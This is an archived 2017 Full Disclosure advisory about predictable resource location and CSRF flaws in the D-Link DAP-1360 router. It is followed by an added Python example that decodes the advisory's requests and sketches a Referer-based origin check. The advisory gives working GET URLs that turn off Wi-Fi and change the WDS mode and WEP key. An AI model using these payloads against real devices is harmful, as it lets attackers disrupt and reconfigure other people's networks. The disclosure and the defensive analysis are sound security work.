lists.openwall.net
Open Source and information security mailing list archives
Message-ID: <00aa01d2c129$4a0a61e0$0100a8c0@pc>
Date: Sat, 29 Apr 2017 23:43:07 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org>
Subject: [FD] PRL and CSRF vulnerabilities in D-Link DAP-1360

Hello list!

After the previous Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities, here are new ones. There are Predictable Resource Location
and Cross-Site Request Forgery vulnerabilities in D-Link DAP-1360 (Wi-Fi
Access Point and Router).

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link DAP-1360, Firmware 1.0.0. This
model with other firmware versions is most likely also vulnerable. D-Link
should fix these CSRF vulnerabilities in the next firmware version, as they
answered me in October 2014.

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's an EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link should possibly fix the
vulnerabilities in new firmware.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware possibly
includes fixes for the vulnerabilities.

----------
Details:
----------

Predictable Resource Location (WASC-34):

When D-Link DAP-1360 is used as a router, the admin panel is reachable at the
fixed address http://dlink.ap. This address is used in different D-Link
devices with router functionality. It simplifies the CSRF and XSS attacks
described in the previous advisories: changing the device's IP address does
not help, because an attacker's page can address the device by that domain
name instead, so CSRF attacks can be conducted remotely without knowing the
LAN address.

CSRF (WASC-09):

This PRL vulnerability can be combined both with all the previous CSRF
vulnerabilities and with the new ones mentioned below. Changing the IP from
the default 192.168.0.50 to another one will not help. All of the requests
below are state-changing GET requests whose parameters, including the JSON
configuration in res_buf, sit entirely in the query string, so any page the
administrator visits while logged in to the device can issue them.

For example, you can turn off Wi-Fi:

http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

CSRF (WASC-09):

In section Wi-Fi - WDS it's possible to change the parameter WDS Mode:

Turn off - Disable:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}

Turn on - Bridge mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Turn on - Repeater mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

------------
Timeline:
------------

2014.05.22 - informed developers about vulnerabilities in D-Link DAP-1360.
2014-2017 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
2017.03.03 - disclosed at my site (http://websecurity.com.ua/8525/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
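An added example, not part of MustLive's advisory or of D-Link's firmware: it decodes the index.cgi requests quoted in the advisory (the URLs are copied verbatim; the dictionary keys, function names, the attacker.example host and the reading of res_config_action=3 as the "write" action are this example's own assumptions) and shows the origin check that a device-side fix for the CSRF issues would need. Because the device answers at the predictable name dlink.ap, the check compares the Referer host against the host the request was actually sent to rather than against a fixed LAN IP, which is the point the PRL finding makes about IP changes not helping.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Requests quoted verbatim in the advisory; the key names are ours, not the device's.
ADVISORY_REQUESTS = {
    "wifi_off": "http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json"
                "&res_config_action=3&res_config_id=39&res_struct_size=0"
                "&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}",
    "wds_disable": "http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json"
                   "&res_config_action=3&res_config_id=109&res_struct_size=0"
                   "&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}",
    "wds_bridge": "http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json"
                  "&res_config_action=3&res_config_id=109&res_struct_size=0"
                  "&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,"
                  "%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,"
                  "%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}",
    "wds_repeater": "http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json"
                    "&res_config_action=3&res_config_id=109&res_struct_size=0"
                    "&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,"
                    "%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,"
                    "%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}",
}


def decode_config_request(url):
    """Split an index.cgi URL into target host, action, config id and the JSON carried in res_buf."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)  # percent-decodes %22 back into the JSON quotes

    def first(key):
        return query.get(key, [None])[0]

    res_buf = first("res_buf")
    return {
        "host": parts.hostname,
        "action": first("res_config_action"),
        "config_id": first("res_config_id"),
        "payload": json.loads(res_buf) if res_buf is not None else None,
    }


def is_state_changing(req):
    # Assumption drawn from the advisory's examples: every quoted write uses res_config_action=3.
    return req["action"] == "3"


def is_cross_site(url, referer):
    """Device-side check a fix would need: reject a write whose Referer is absent or names a
    different host than the one the request was sent to. A missing Referer is treated as
    cross-site (fail closed), since an attacker's page can suppress it."""
    req = decode_config_request(url)
    if not is_state_changing(req):
        return False
    if not referer:
        return True
    return urlsplit(referer).hostname != req["host"]


def summarize():
    """Map each advisory request to (target host, res_config_id, decoded res_buf)."""
    out = {}
    for name, url in ADVISORY_REQUESTS.items():
        req = decode_config_request(url)
        out[name] = (req["host"], req["config_id"], req["payload"])
    return out


if __name__ == "__main__":
    for name, (host, config_id, payload) in summarize().items():
        print(f"{name}: host={host} config_id={config_id} payload={payload}")
    # attacker.example is a constructed hostname standing in for any third-party page
    # that embeds the wifi_off URL (e.g. in an image tag) while the admin is logged in.
    print(is_cross_site(ADVISORY_REQUESTS["wifi_off"], "http://attacker.example/page"))
    print(is_cross_site(ADVISORY_REQUESTS["wifi_off"], "http://dlink.ap/index.cgi"))
```

The decoded payloads make the risk concrete: config id 39 flips the radio off, and config id 109 rewrites the whole WDS block, including a WEP key, in one GET. Referer matching is the minimal check; it would also reject a legitimate admin who reached the device as 192.168.0.50 while the request goes to dlink.ap, and it depends on the browser sending the header, so a per-session anti-CSRF token on every write is the more robust fix.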